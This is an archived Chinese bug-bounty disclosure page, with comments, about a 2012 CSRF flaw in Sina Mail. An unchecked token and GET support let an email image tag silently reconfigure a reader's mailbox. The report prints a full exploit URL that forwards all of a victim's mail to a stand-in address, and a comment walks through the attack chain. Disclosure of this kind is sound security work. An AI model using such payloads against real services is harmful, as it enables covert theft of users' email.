漏洞概要
关注数(24)
关注此漏洞
漏洞标题:新浪一处搞笑的CSRF,可以窃取用户邮件
相关厂商:新浪
提交时间:2012-10-30 14:20
修复时间:2012-12-14 14:21
公开时间:2012-12-14 14:21
漏洞类型:CSRF
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2012-10-30: 细节已通知厂商并且等待厂商处理中
2012-10-30: 厂商已经确认,细节仅向厂商公开
2012-11-09: 细节向核心白帽子及相关领域专家公开
2012-11-19: 细节向普通白帽子公开
2012-11-29: 细节向实习白帽子公开
2012-12-14: 细节向公众公开
简要描述:
这几天,把SINA/SOHU/163通通CSRF了一遍。。国内普通不重视CSRF啊。
为什么说这个搞笑呢? 因为形式上,这个链接是做了CSRF防范的,可事实上。。。
详细说明:
可以修改用户邮箱设置,而且可以使用GET方式。所以,攻击者可以直接<IMG SRC=xxx>发封邮件给对方,对方只要一看到这封邮件即刻中标。
我的demo中是把用户邮件全转到一个指定邮箱。。。当然,还可以干别的设置。所以,这个算相当高危的吧。。。
话说,你们那TOKEN......和尚头上的虱子啊.....
http://m1.mail.sina.com.cn/wa.php?a=update_setting&ListNum=20&forword_mode=3&signtext=%3CDIV%3E%26nbsp%3B%3CBR%3E%3C%2FDIV%3E&AddAddr=1&AddOut=1&ReplyInc=0&ReSubLang=CHE&autore=0&autofo=1&forwordemail=test@xss.com&ShowMailSize=0&normalSign=0&vcardSign=0&weiboSign=0&autoreic=0&weibonotify=0&autoretext=&token=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2012-10-30 16:10
厂商回复:
感谢提供,马上跟进处理。
最新状态:
暂无
漏洞评价:
评论
-
2012-10-30 14:22 |
瘦蛟舞 
( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)
-
2012-10-30 14:24 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2012-10-30 14:26 |
promise ( 路人 | Rank:22 漏洞数:4 | 低调的各种路过!!!)
-
2012-10-30 14:32 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-10-30 14:45 |
疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)
-
2012-10-30 14:51 |
苦逼老爷爷 ( 普通白帽子 | Rank:211 漏洞数:17 | 用户太懒什么都没留下)
@疯子 @promise @鬼魅羊羔 @瘦蛟舞 汗,不敢当啊。。。。CSRF嘛,一个个链接检查下去看看有没有二次认证,没含量的啊。。。
-
2012-10-30 15:10 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
@苦逼老爷爷 那也不行!我们都说求带了,你好意思拒绝啊?
-
2012-10-30 16:20 |
zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])
-
2012-10-30 17:09 |
promise ( 路人 | Rank:22 漏洞数:4 | 低调的各种路过!!!)
@苦逼老爷爷 各种姿势的求,求sql 注入 求ROOT 求脱掉!!!
-
2012-10-30 18:51 |
shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)
-
2012-10-30 19:48 |
苦逼老爷爷 ( 普通白帽子 | Rank:211 漏洞数:17 | 用户太懒什么都没留下)
这个洞受关注的程度超过偶的想象啊。。。求带真的不敢,但只是运气再加了一点仔细而已。刚才检查了一下,SINA已经修复了这个漏洞,所以偶就公开说了吧。CSRF大家都懂的,威力很猛,但技术含量不大,只要仔细检查一下系统有没有进行二次认证即可。SINA的这次问题出在邮箱上,邮箱是CSRF利用的极品,是需要重点关注的,因为邮箱的用户必须登录后才能进行操作,换句话说,只要不使用二次认证同时使用SSO认证,很容易中标。SINA邮箱,修改用户资料,使用了一个链接 wa.php?a=update_setting,同时通过POST传入包括签名/转发/回复等一系列信息,同时也传入了token。CSRF本来是没希望的,但偏偏程序员疏漏,没有对传入的token进行检查,活生生把二次认证变成一次,而这一次已经在邮箱登录完成;另一方面,wa.php虽然系统调用使用POST,但其实是支持GET方式的,而GET方面最好的利用就使用图片标签,而偏偏邮件系统是可以直接使用<img src>方式的嵌入的。于是一个攻击链就形成了,恶意攻击者只需要向受害者发送一封邮件,里面构造一个<img src=".....wa.php?a=update_setting..">的图片,受害者只要打开这邮件,或者预览该邮件,用户信息即被静默地修改了。。。攻击完成。
-
2012-10-30 19:52 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
@苦逼老爷爷 原来如此,大概了解了。。多谢了,我们还是这方面的新手,请多指教哈。洞主威武。。
-
2012-10-30 20:26 |
zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])
-
2012-10-30 20:34 |
shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)
-
2012-10-30 21:55 |
苦逼老爷爷 ( 普通白帽子 | Rank:211 漏洞数:17 | 用户太懒什么都没留下)
@shack2 不需要xss的。这个csrf标准得就象教科书上的一样。
-
2012-10-31 07:43 |
shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)
直接发图片就行,src带上连接就行,哈哈,这个确实很
-
2012-11-02 23:55 |
Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)
-
2012-11-03 02:20 |
园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)
-
2012-11-09 17:32 |
imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )
-
2012-11-23 13:13 |
猴子 ( 路人 | Rank:19 漏洞数:5 | 我是一只骚猴子)
-
2012-11-30 08:57 |
huliang ( 路人 | Rank:12 漏洞数:3 | 过往如昙花一现)
@苦逼老爷爷 有必要出个工具测测那些带Token的大站是不是否是形同虚设 ###
-
2012-12-14 16:22 |
guiker ( 路人 | Rank:0 漏洞数:1 | PHP屌丝程序员!)
-
2012-12-14 17:18 |
webshell ( 实习白帽子 | Rank:58 漏洞数:18 | 没有伞的孩子必须努力奔跑。)
学习了。。其实我之前发的csrf的东东就包含这些。。就看大家会不会利用这些洞洞。。
-
2012-12-18 13:24 |
Richard ( 路人 | Rank:6 漏洞数:2 )
-
2013-01-30 10:06 |
rivers ( 实习白帽子 | Rank:85 漏洞数:10 | research on web security)
